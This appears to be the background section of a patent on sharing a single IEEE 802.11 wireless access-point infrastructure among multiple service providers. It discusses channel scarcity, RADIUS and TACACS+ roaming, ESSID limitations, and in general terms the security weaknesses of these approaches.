1. Field of the Invention
This invention relates generally to wireless network communications, and more specifically to a system and method enabling a network infrastructure to support multiple wireless service providers and/or customers of multiple wireless service providers. The invention also relates to a system and method enabling different access levels within a wired or wireless network system.
2. Description of the Relevant Art
Various types of wired and wireless infrastructures are being developed to service users of computing devices, such as portable computing devices (PCDs). Currently, numerous wireless service providers are attempting to install wireless network infrastructures in various locations, such as airports, hotels, office buildings, shopping malls, etc. for use by various users, such as mobile users (MUs) of PCDs.
However, when two or more providers install a wireless network infrastructure in a single location, such as an airport, the providers begin to oversubscribe the RF domain. In other words, the electromagnetic spectrum usable by these wireless networks is limited, and if two or more wireless networks are installed in the same location, this may result in inadequate RF bandwidth for use by each of these networks.
IEEE 802.11 defines the IEEE standard for wireless Ethernet. IEEE 802.11 is designed to support multiple overlapping wireless local area networks (LANs) in a given coverage area. Each wireless local area network will typically include one or more access points (APs) which communicate in a wireless fashion with a corresponding computing device of a user, which typically includes a wireless Ethernet transceiver. IEEE 802.11 currently uses a System ID (SID) to “select” which LAN to use and the access point with which to associate.
Currently, only 3 non-overlapping RF channels are available for different wireless service providers. Once these channels are used, no further bandwidth, or limited bandwidth, may be available for other providers.
In the U.S. and most of Europe, only 3 non-overlapping channels are available using 802.11 Direct Spread (802.11 DS) (Direct Sequence Spread Spectrum) radios. In other geographies, such as France and Japan, only one channel is available using 802.11 DS. When using Frequency Hopping radios, only one “channel” is defined. The use of different “spreading codes” in conjunction with FH radios only obfuscates the co-interference. Once the available channels are used, perhaps one by each provider of a wireless infrastructure, no further bandwidth is available for other providers without the potential for harmful co-interference and the resultant reduction in available bandwidth.
Thus, due to the problems associated with multiple wireless infrastructures installed in a common area, it is desirable to provide a single wireless infrastructure which may be used by two or more wireless service providers (WSPs). This would allow a plurality of WSPs to utilize a common set of access points (APs) to provide service to a potentially overlapping set of customers or subscribers. It may also be desirable to provide a wireless infrastructure which can selectively provide different access levels to users of the system.
In the installation of a common-use wireless system, there are commonly two approaches to providing service to each WSP's subscribers, wherein each approach uses a common authentication/accounting system. A common authentication/accounting system involves “tying together” the authentication/accounting systems of each provider, thereby forming a “roaming consortium”. The first approach is called RADIUS (Remote Authentication Dial In User Service), and the second approach is called TACACS+. Typically these consortiums use the RADIUS as a common authentication and accounting protocol. RADIUS is a protocol defined by the IETF RADIUS Working Group for carrying information between network access devices and security/accounting servers, and is documented in RFCs 2138 and 2139. TACACS+, a similar protocol developed by Cisco Systems, is also used by some providers, although it suffers from security issues in common implementations.
The main advantage of tying the authentication/accounting systems together is the relative ease of doing so. Indeed, RADIUS was designed to support a tiered hierarchy of services providers. However, this seeming ease of implementation hides other issues which remain unsolved via this approach. Most of these center around the fact that RADIUS and TACACS+ were designed to support connectivity via a dial-up network (using either modems or ISDN). Indeed, the very acronym “RADIUS” references this dial-up heritage and focus. Since Wireless LANs are not “dial-up” by their very nature, several assumptions which are “built-in” to the RADIUS and TACACS+ protocols have the potential to limit the type and number of services deployed over wireless LANs.
RADIUS has its share of security issues as well. The RADIUS protocol is open to a possible dictionary attack on “shared secret” passwords. Discovery of these can be used to spoof “Access-Accept” packets, with the result of “free service” being granted to the attacker. While this security hole is only possible if the attacker is able to “sniff” communications between the RADIUS server and client, wireless networks make this type of unauthorized access even more likely.
However, the most glaring issue associated with using a common authentication/accounting system is that any approach that ties the authentication and accounting systems of a set of WSPs together does nothing to solve problems related to “ESSIDs”, described below.
As noted above, the IEEE 802.11 specification is a wireless LAN standard developed by the IEEE (Institute of Electrical and Electronic Engineering) committee in order to specify an “over the air” interface between a wireless client and a base station or Access Point, as well as among wireless clients. First conceived in 1990, the standard has evolved from various Draft versions (Drafts 1 through 6), with approval of the final draft on Jun. 26, 1997.
The 802.11 MAC layer, supported by an underlying PHY layer, is concerned primarily with rules for accessing the wireless medium. Two network architectures are defined: the Infrastructure Network and the Ad Hoc Network. The Infrastructure Network is a network architecture for providing communication between wireless clients and wired network resources. The transmission of data from the wireless to the wired medium is via an Access Point (AP). The coverage area is defined by an AP and its associated wireless clients, and together all the devices form a Basic Service Set (BSS).
The IEEE 802.11 protocol also defines an ESSID (Extended Service Set ID) that is essentially a network name. The ESSID is used to select an associated wireless LAN infrastructure. Two or more BSSs configured with the same ESSID attached to a common distribution system (for instance, an Ethernet LAN) form an ESS (Extended Service Set.)
With multiple access points, clients (PCDs) are free to move seamlessly between access points, as long as the ESSID matches. This feature is built into the 802.11 specification. When a client (PCD) starts losing the signal with its associated access point, it begins to search the area for a closer access point. Once a new access point is found, the client initiates an association with the new access point and a disassociation from the old one.
In public-access networks the ESSID has been commonly used to choose the WSP infrastructure with which to associate. However, this creates a problem: Each AP can only support one ESS and one associated ESSID. Thus, in order for multiple service providers to share a common space, N sets of APs are needed, where N is the number of service providers. This leads to co-interference, over-subscription of the RF environment and resultant lack of available bandwidth, as described above.
The commonly suggested solution to this problem is that all WSPs who wish to allow roaming agree on a common ESSID for their wireless networks. While initially this may appear to solve the problem, it also requires not only a common authentication system, but also a common network infrastructure which connects to the Internet and other services. The issues with a common authentication system have been outlined above. There are also numerous issues associated with using a common ESSID to support multiple WSPs in a common network infrastructure.
First, a common network infrastructure with a shared ESSID would result in insufficient network security. Since all devices would necessarily be associated with the same network infrastructure, all manner of attacks, both active (such as Denial of Service) and passive (e.g. snooping or sniffing) would be possible.
Second, to rely on coordination of ESSIDs among a potentially large number of WSPs seems questionable at best. As new providers enter the market, each must choose to configure its APs such that roaming by other providers' subscribers is permitted. In fact, the case can be made that every WSP who chooses to participate in any roaming network would need to configure ALL of its APs to support this as yet undefined ESSID.
Even if these steps are taken, once every WSP has chosen to use the same ESSID, a new problem occurs. Unless roaming agreements are global, and every provider agrees to allow each other provider to roam on its APs, the user of any given service cannot know that his/her WSP(s) provide service in any given area. The user of such a service is left to “guess” at service availability.
Further, global coordination around a single ESSID (combined with a common authentication system) does not solve the problem. An increasing number of enterprises (large and small) are installing 802.11-compliant network infrastructures, and equipping the employees of these companies with wireless Network Interface Cards (NICs). Each of these enterprises will likely define its own ESSID, and possibly an associated WEP (Wired Equivalent Privacy) key. Further still, inexpensive 802.11-compliant APs are now available for the home market (witness the Apple Airport), and these wireless networks will likely have their own ESSIDs.
Thus, even if all WSPs select and co-ordinate on a single ESSID, enterprises (including airlines) and other users of 802.11-compliant NICs will need to reconfigure their equipment in order to use any common-ESSID network provided by these WSPs. This would likely be too inconvenient for most users.
Finally, given a common infrastructure, only one broadcast domain is possible. For an IP-based network (such as must be supplied to provide connectivity to the Internet), this implies that only one IP address space (and by extension, one Dynamic Host Configuration Protocol (DHCP) server) is possible for each location. This implies that the WSP who owns the infrastructure (and supplies the connectivity) in each location has an advantage in that the network connectivity for that WSP's customers will experience better connectivity. Also implied is that any resource located on the network (such as file or video servers, voice gateways, and otherwise secured facilities of other airport tenants) is available to all users of the wireless infrastructure, and thus no service differentiation is possible.
Therefore, it would be desirable to provide a system and method which enables a common wireless network infrastructure (and especially an IEEE 802.11 wireless network infrastructure) to be used by two or more wireless service providers (WSPs). This would allow a plurality of service providers to utilize a common set of access points to provide service to a potentially overlapping set of customers. This would also provide subscribers or users with the ability to more fully utilize the existing network infrastructure. It would further be desirable to provide a distributed wireless network system which can selectively provide different access levels to users of the system.